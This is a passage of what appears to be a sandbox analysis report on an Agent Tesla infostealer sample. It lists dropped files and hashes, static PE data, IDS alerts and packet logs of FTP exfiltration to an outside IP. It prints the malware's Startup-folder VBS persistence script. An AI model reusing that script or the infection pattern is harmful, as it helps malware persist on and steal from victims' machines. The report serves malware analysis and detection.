                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.

                                  C:\Users\user\AppData\Local\Temp\autC77D.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Reputation:low
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..

                                  C:\Users\user\AppData\Local\Temp\autC8C6.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.

                                  C:\Users\user\AppData\Local\Temp\autFA54.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):15164
                                  Entropy (8bit):7.586580449950993
                                  Encrypted:false
                                  SSDEEP:384:E9/Rtsnvg+rszHYJ3RfCcQXtlJNUM0/kMr8Ad9GTbx:ERA4+rszmCVXtlJNv0cMr8Aqp
                                  MD5:66846AEF53EF56251022A8A41B58BCBD
                                  SHA1:18C07153E15706C74B9ABB00A181874BD32C8CC6
                                  SHA-256:9DE04BF5A68396247654016C9108D6B48A452C065B7ABECBB0A9CB27890813CF
                                  SHA-512:4DAF1E3C0BDB017E77EA42C86315CE8F19A3924615A781101BEE04CED3C263FFF26BA3CF77BE6795464681E557FAA1E5CEDAC69F49843DC3ED2E4541F0F098BA
                                  Malicious:false
                                  Preview:EA06.....Zo.........SP.n......5e...`.....|....T...3...(.6&.....9vp.=...G.....7@..9......$..k...........c}V.....?.P...p...Y@Q?.{..'..c.D.&.N. .'.9e.D.&`...D..' ...D...s...D...S.(......sP...h...M.Q?.y..G.c.D....Q.......O......60..........vh...0.7..!.....)^...t.C........$..C......l>[......!....|.0...&d.....Hz..a....l?..uo.....P......V0....j......|......l.....A.?.. Bg.8.l.E..Ed.L...?.. Bg.....Y..>@.............@..'.....8|.?..u.........l. O..]e...O..!e...& ....#s.......3.Y....9.......9..M.7?............l?...F..........C7....g .........x2..8.a...?..j..+4.....W?..j....Y..M. ?.0....Q...d}S0{.......M.".@...Z........V....n.....Q>...'.N...r..(.-........0W.........(....... 6..p.....6zh......?.....O8....lCN....i..?..8}@L..E.i.....61...f#q....>.N....4..M.Q?.q.........D..0N..V.A..M.>K0i..d.h.&...%.Y...|.*..<..aw.].3c..H.@B?...G..1...' ....k|.A.O..#.....}V`....#..H|.P!..d....0z....Y..>K..G.*/....G.7c.H..b....W..1....?.01..b.!...@.?..o.F|....p9......S.!..nb.!....zb0..

                                  C:\Users\user\AppData\Local\Temp\autFAF2.tmp

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):145858
                                  Entropy (8bit):7.932961480786955
                                  Encrypted:false
                                  SSDEEP:3072:ITVCXomKKjaplxH0y4SemHQADsuAeAfrMv6yn/wi/EuHmo4GIG1gpqq:kC43KeF0y4kHPw/fQ6K/wrloRgpqq
                                  MD5:D0303F79E60A6141398F02F8633A1C84
                                  SHA1:CB3A8F2514B107AF77A31A282E976FA6F858012C
                                  SHA-256:403C9C5FE0F66031019230A513EE618B1ABA961430C9E496D88F2A8D09903122
                                  SHA-512:A855EA1D71CCE1F4F0265E4238B313FB284D4037677EF2524E6ED1DB97FCAAAC83FAB90F582B8B974B5BF24C62F46237FC2495F10B7CEB2E4B3EB6B556D167AA
                                  Malicious:false
                                  Preview:EA06.....B9.y...1.Ni..".X..@.J..y...U...ng ..OH.4..=.j.....z../...:.."...zkK..-.I..sZ..sx..#....{.:#...U...R..'f.....i..c..W.....L.s*|.7.V..ZH.."~Z.b...46S..r.R.]..I.JsJ.4...sW*.^kC...>o........4..U.8..+.....'T....A..'.._<.N.....~.JsF.....9.....c....0.....-...l...'z3N..c2.\.....N]p.Bf..y'@...8.D.J.U.t..@...A3...N|.:.@....&@....7...?m-2s%.T..@.raR...=..Ig.#..}o....K.M...E{.4.........C..e....A.....1.P..8..;M....9.#...H...="....|[{T.D..RX.....w:.=..E.\.s..rQ..g'.....j.Y2..5.-..p#.i.+...7.I...|.O.2....6..&..\.i8..v.\.C)..v*.[.".T.W..9U...~..}....g...eL....h.0....hN.4....G.A$.......{(.Qd..*...L......%.m..n.2L...F.kvV...I..[........6.....J..o$"...._.-..~.w....z...@*T....U..f4J..:.A(w.f......y.&{N.....^.-.........e..K..Y2.y.*.B.:..l.Z.8p@.M.8.h.i..Z..c...#....wP...*\.."..'.{.V-a.Rg.i...(s:...1.......ER.."|.D......5).2...V%6:..kz.S.6jT..h..&r.:sG.L..@.LN......5..o G..X.h_et9........,.kA.F.....=.V*.J.vO..V8...b.%..i.fe*s...+4.]..{.R...J.U......a8..i...Z.

                                  C:\Users\user\AppData\Local\Temp\batchers

                                  Download File
                                  Process:C:\Users\user\Desktop\XoRPyi5s1i.exe
                                  File Type:ASCII text, with very long lines (65536), with no line terminators
                                  Category:dropped
                                  Size (bytes):178198
                                  Entropy (8bit):3.174329330978397
                                  Encrypted:false
                                  SSDEEP:48:sb3feqfCpfS6ftqfA0f9fWf9fZ1fi20fq0fFfY6fofi51fK0fi0fCfZ1fK0f70fg:iaNibHCIL8aDfffXz6w43Ck/sqoHklX
                                  MD5:A09D7CF7B10B8AF8265563ECFD0DEC02
                                  SHA1:8603B072F64A75D50663F4BA60F94DE0C7E59FD4
                                  SHA-256:01937F48007048229842F0743CC2D2F80330289E8A3FA26DBF32A13D6C95B339
                                  SHA-512:029C037CD58C55420C34BD68CC467947B877888E26E4C84D8FA68F97D667D7EE4A6DED7AC5152BA0C0C61182205B58D9F4A5CC6C409EDFDFAB4074DE3AB49764
                                  Malicious:false
                                  Preview:hixjs0hixjsxhixjs5hixjs5hixjs8hixjsbhixjsehixjschixjs8hixjs1hixjsehixjschixjschixjschixjs0hixjs2hixjs0hixjs0hixjs0hixjs0hixjs5hixjs6hixjs5hixjs7hixjsbhixjs8hixjs6hixjsbhixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjs4hixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjs6hixjsbhixjsahixjs7hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjs8hixjsbhixjs8hixjs6hixjsehixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs8hixjsahixjsbhixjs9hixjs6hixjs5hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixjs8hixjschixjsbhixjsahixjs6hixjschixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs5hixjs5hixjs8hixjsehixjsbhixjs8hixjs3hixjs3hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjs5hixjs9hixjs0hixjsbhixjs9hixjs3hixjs2hixjs0hixjs0hixjs0hixjs0hixjs0hixjs0hixjs6hixjs6hixjs8hixjs9hixjs4hixjsdhixj

                                  C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\unjuridically.vbs

                                  Download File
                                  Process:C:\Users\user\AppData\Local\Lityerses\unjuridically.exe
                                  File Type:data
                                  Category:dropped
                                  Size (bytes):288
                                  Entropy (8bit):3.4173336582208513
                                  Encrypted:false
                                  SSDEEP:6:DMM8lfm3OOQdUfclwL1UEZ+lX14lDRw1blanriIM8lfQVn:DsO+vNlwBQ1oFwBlYmA2n
                                  MD5:9CA9F5C10E4515D40608CCBC7CAC077C
                                  SHA1:46E834D545178757AE333AC2B0EB0E365BEE46C7
                                  SHA-256:B488992CCBEED1685ED528794139CC44D84CA744AAEB51EA5BB192E3824E6AB1
                                  SHA-512:C42499CB47DD6ED6589504F39A410498B523CBB73B8FADFD81CD938E5375BC1AF602A80B4DF0D64FA83A55174FB94071015F2C66279F6D8F7E5EC7668E5A77F3
                                  Malicious:true
                                  Preview:S.e.t. .W.s.h.S.h.e.l.l. .=. .C.r.e.a.t.e.O.b.j.e.c.t.(.".W.S.c.r.i.p.t...S.h.e.l.l.".)...W.s.h.S.h.e.l.l...R.u.n. .".C.:.\.U.s.e.r.s.\.h.u.b.e.r.t.\.A.p.p.D.a.t.a.\.L.o.c.a.l.\.L.i.t.y.e.r.s.e.s.\.u.n.j.u.r.i.d.i.c.a.l.l.y...e.x.e.".,. .1...S.e.t. .W.s.h.S.h.e.l.l. .=. .N.o.t.h.i.n.g...

                                  Static File Info

                                  General

                                  File type:PE32 executable (GUI) Intel 80386, for MS Windows, UPX compressed
                                  Entropy (8bit):7.9240582473113905
                                  TrID:
                                  • Win32 Executable (generic) a (10002005/4) 99.39%
                                  • UPX compressed Win32 Executable (30571/9) 0.30%
                                  • Win32 EXE Yoda's Crypter (26571/9) 0.26%
                                  • Generic Win/DOS Executable (2004/3) 0.02%
                                  • DOS Executable Generic (2002/1) 0.02%
                                  File name:XoRPyi5s1i.exe
                                  File size:550'912 bytes
                                  MD5:fc76d8b178c0aa094eba5fea74e82614
                                  SHA1:f2f88413e1e3aed4fd731769037c3d2391d29c94
                                  SHA256:811c8854ea3adcd1259c28cf1dc60e0a0a2f7a44f463e98f77c277a2a2f6394b
                                  SHA512:72f5ca123610cbc3ccee6630148c61e99f8ddbffbbe835eb2bf323a0a6d5f2fdd57bafa139595e62ea485f2086b1dd46f994281070639cd5e7ff89eb3422fd2b
                                  SSDEEP:12288:ZOv5jKhsfoPA+yeVKUCUxP4C902bdRtJJPiGDtC2ajbP50s3o32+:Zq5TfcdHj4fmbcv13GV
                                  TLSH:91C422A09490CCB7E6913771C17ACEA50A287932DE85675D1BA4F20E78B278355C3B3F
                                  File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........d..............'.a.....H.k.....H.h.....H.i......}%......}5...............~.......k.......o.......1.......j.....Rich...........

                                  File Icon

                                  Icon Hash:aaf3e3e3938382a0

                                  Static PE Info

                                  General

                                  Entrypoint:0x50af60
                                  Entrypoint Section:UPX1
                                  Digitally signed:false
                                  Imagebase:0x400000
                                  Subsystem:windows gui
                                  Image File Characteristics:EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE, 32BIT_MACHINE
                                  DLL Characteristics:DYNAMIC_BASE, TERMINAL_SERVER_AWARE
                                  Time Stamp:0x6768EE06 [Mon Dec 23 04:58:46 2024 UTC]
                                  TLS Callbacks:
                                  CLR (.Net) Version:
                                  OS Version Major:5
                                  OS Version Minor:1
                                  File Version Major:5
                                  File Version Minor:1
                                  Subsystem Version Major:5
                                  Subsystem Version Minor:1
                                  Import Hash:ef471c0edf1877cd5a881a6a8bf647b9

                                  Entrypoint Preview

                                  Instruction
                                  pushad
                                  mov esi, 004B7000h
                                  lea edi, dword ptr [esi-000B6000h]
                                  push edi
                                  jmp 00007F33C4DF854Dh
                                  nop
                                  mov al, byte ptr [esi]
                                  inc esi
                                  mov byte ptr [edi], al
                                  inc edi
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F33C4DF852Fh
                                  mov eax, 00000001h
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  add ebx, ebx
                                  jnc 00007F33C4DF854Dh
                                  jne 00007F33C4DF856Ah
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F33C4DF8561h
                                  dec eax
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc eax, eax
                                  jmp 00007F33C4DF8516h
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  jmp 00007F33C4DF8594h
                                  xor ecx, ecx
                                  sub eax, 03h
                                  jc 00007F33C4DF8553h
                                  shl eax, 08h
                                  mov al, byte ptr [esi]
                                  inc esi
                                  xor eax, FFFFFFFFh
                                  je 00007F33C4DF85B7h
                                  sar eax, 1
                                  mov ebp, eax
                                  jmp 00007F33C4DF854Dh
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F33C4DF850Eh
                                  inc ecx
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jc 00007F33C4DF8500h
                                  add ebx, ebx
                                  jne 00007F33C4DF8549h
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  adc ecx, ecx
                                  add ebx, ebx
                                  jnc 00007F33C4DF8531h
                                  jne 00007F33C4DF854Bh
                                  mov ebx, dword ptr [esi]
                                  sub esi, FFFFFFFCh
                                  adc ebx, ebx
                                  jnc 00007F33C4DF8526h
                                  add ecx, 02h
                                  cmp ebp, FFFFFB00h
                                  adc ecx, 02h
                                  lea edx, dword ptr [edi+ebp]
                                  cmp ebp, FFFFFFFCh
                                  jbe 00007F33C4DF8550h
                                  mov al, byte ptr [edx]

                                  Rich Headers

                                  Programming Language:
                                  • [ C ] VS2008 SP1 build 30729
                                  • [IMP] VS2008 SP1 build 30729
                                  • [ASM] VS2012 UPD4 build 61030
                                  • [RES] VS2012 UPD4 build 61030
                                  • [LNK] VS2012 UPD4 build 61030

                                  Data Directories

                                  NameVirtual AddressVirtual Size Is in Section
                                  IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IMPORT0x13ddb00x424.rsrc
                                  IMAGE_DIRECTORY_ENTRY_RESOURCE0x10c0000x31db0.rsrc
                                  IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                  IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                  IMAGE_DIRECTORY_ENTRY_BASERELOC0x13e1d40x18.rsrc
                                  IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                  IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x10b1440x48UPX1
                                  IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_IAT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                  IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                  IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0

                                  Sections

                                  NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                  UPX00x10000xb60000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  UPX10xb70000x550000x54200b39f99699c35c7412c65719709b96360False0.9887281760772659data7.9369165461082085IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                  .rsrc0x10c0000x330000x322004b935071c0d122b398417d2440a0815eFalse0.8989294342269327data7.830114850814129IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE

                                  Resources

                                  NameRVASizeTypeLanguageCountryZLIB Complexity
                                  RT_ICON0x10c5ac0x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.7466216216216216
                                  RT_ICON0x10c6d80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128, 16 important colorsEnglishGreat Britain0.3277027027027027
                                  RT_ICON0x10c8040x128Device independent bitmap graphic, 16 x 32 x 4, image size 192EnglishGreat Britain0.3885135135135135
                                  RT_ICON0x10c9300x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 0EnglishGreat Britain0.3333333333333333
                                  RT_ICON0x10cc1c0x128Device independent bitmap graphic, 16 x 32 x 4, image size 0EnglishGreat Britain0.5
                                  RT_ICON0x10cd480xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0EnglishGreat Britain0.2835820895522388
                                  RT_ICON0x10dbf40x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0EnglishGreat Britain0.37906137184115524
                                  RT_ICON0x10e4a00x568Device independent bitmap graphic, 16 x 32 x 8, image size 0EnglishGreat Britain0.23699421965317918
                                  RT_ICON0x10ea0c0x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0EnglishGreat Britain0.13858921161825727
                                  RT_ICON0x110fb80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0EnglishGreat Britain0.25070356472795496
                                  RT_ICON0x1120640x468Device independent bitmap graphic, 16 x 32 x 32, image size 0EnglishGreat Britain0.3173758865248227
                                  RT_MENU0xca4a00x50dataEnglishGreat Britain1.1375
                                  RT_STRING0xca4f00x594dataEnglishGreat Britain1.007703081232493
                                  RT_STRING0xcaa840x68adataEnglishGreat Britain1.0065710872162486
                                  RT_STRING0xcb1100x490dataEnglishGreat Britain1.009417808219178
                                  RT_STRING0xcb5a00x5fcdataEnglishGreat Britain1.0071801566579635
                                  RT_STRING0xcbb9c0x65cdataEnglishGreat Britain1.0067567567567568
                                  RT_STRING0xcc1f80x466dataEnglishGreat Britain1.0097690941385435
                                  RT_STRING0xcc6600x158dataEnglishGreat Britain1.0319767441860466
                                  RT_RCDATA0x1124d00x2b388data1.0003445704731349
                                  RT_GROUP_ICON0x13d85c0x76dataEnglishGreat Britain0.6610169491525424
                                  RT_GROUP_ICON0x13d8d80x14dataEnglishGreat Britain1.25
                                  RT_GROUP_ICON0x13d8f00x14dataEnglishGreat Britain1.15
                                  RT_GROUP_ICON0x13d9080x14dataEnglishGreat Britain1.25
                                  RT_VERSION0x13d9200xdcdataEnglishGreat Britain0.6181818181818182
                                  RT_MANIFEST0x13da000x3b0ASCII text, with CRLF line terminatorsEnglishGreat Britain0.5116525423728814

                                  Imports

                                  DLLImport
                                  KERNEL32.DLLLoadLibraryA, GetProcAddress, VirtualProtect, VirtualAlloc, VirtualFree, ExitProcess
                                  ADVAPI32.dllAddAce
                                  COMCTL32.dllImageList_Remove
                                  COMDLG32.dllGetSaveFileNameW
                                  GDI32.dllLineTo
                                  IPHLPAPI.DLLIcmpSendEcho
                                  MPR.dllWNetUseConnectionW
                                  ole32.dllCoGetObject
                                  OLEAUT32.dllVariantInit
                                  PSAPI.DLLGetProcessMemoryInfo
                                  SHELL32.dllDragFinish
                                  USER32.dllGetDC
                                  USERENV.dllLoadUserProfileW
                                  UxTheme.dllIsThemeActive
                                  VERSION.dllVerQueryValueW
                                  WININET.dllFtpOpenFileW
                                  WINMM.dlltimeGetTime
                                  WSOCK32.dllsocket

                                  Possible Origin

                                  Language of compilation systemCountry where language is spokenMap
                                  EnglishGreat Britain

                                  Network Behavior

                                  Suricata IDS Alerts

                                  TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                  2025-01-10T17:51:38.374886+01002029927ET MALWARE AgentTesla Exfil via FTP1192.168.2.849711162.241.62.6321TCP
                                  2025-01-10T17:51:38.771740+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.849712162.241.62.6343704TCP
                                  2025-01-10T17:51:38.778606+01002855542ETPRO MALWARE Agent Tesla CnC Exfil Activity1192.168.2.849712162.241.62.6343704TCP

                                  Network Port Distribution

                                  TCP Packets

                                  TimestampSource PortDest PortSource IPDest IP
                                  Jan 10, 2025 17:51:24.229266882 CET4970480192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:24.234203100 CET8049704208.95.112.1192.168.2.8
                                  Jan 10, 2025 17:51:24.234292984 CET4970480192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:24.245347023 CET4970480192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:24.250240088 CET8049704208.95.112.1192.168.2.8
                                  Jan 10, 2025 17:51:24.753062010 CET8049704208.95.112.1192.168.2.8
                                  Jan 10, 2025 17:51:24.801062107 CET4970480192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:28.101537943 CET4970621192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:28.106374979 CET2149706162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:28.106442928 CET4970621192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:28.412142992 CET4970621192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:28.417073965 CET2149706162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:28.417118073 CET4970621192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:35.437417984 CET4971080192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:35.442301989 CET8049710208.95.112.1192.168.2.8
                                  Jan 10, 2025 17:51:35.442408085 CET4971080192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:35.442747116 CET4971080192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:35.447511911 CET8049710208.95.112.1192.168.2.8
                                  Jan 10, 2025 17:51:35.916877031 CET8049710208.95.112.1192.168.2.8
                                  Jan 10, 2025 17:51:35.974479914 CET4971080192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:36.521711111 CET4970480192.168.2.8208.95.112.1
                                  Jan 10, 2025 17:51:36.817935944 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:36.822803020 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:36.822905064 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:37.368268013 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:37.368504047 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:37.373426914 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:37.680449009 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:37.680736065 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:37.685818911 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:37.898473024 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:37.898613930 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:37.903386116 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.013902903 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.014071941 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.019049883 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.130022049 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.130220890 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.135068893 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.245302916 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.245445013 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.250247002 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.369242907 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.369963884 CET4971243704192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.374739885 CET4370449712162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.374808073 CET4971243704192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.374886036 CET4971121192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.379755974 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.771456957 CET2149711162.241.62.63192.168.2.8
                                  Jan 10, 2025 17:51:38.771739960 CET4971243704192.168.2.8162.241.62.63
                                  Jan 10, 2025 17:51:38.771797895 CET4971243704192.168.2.8162.241.62.63
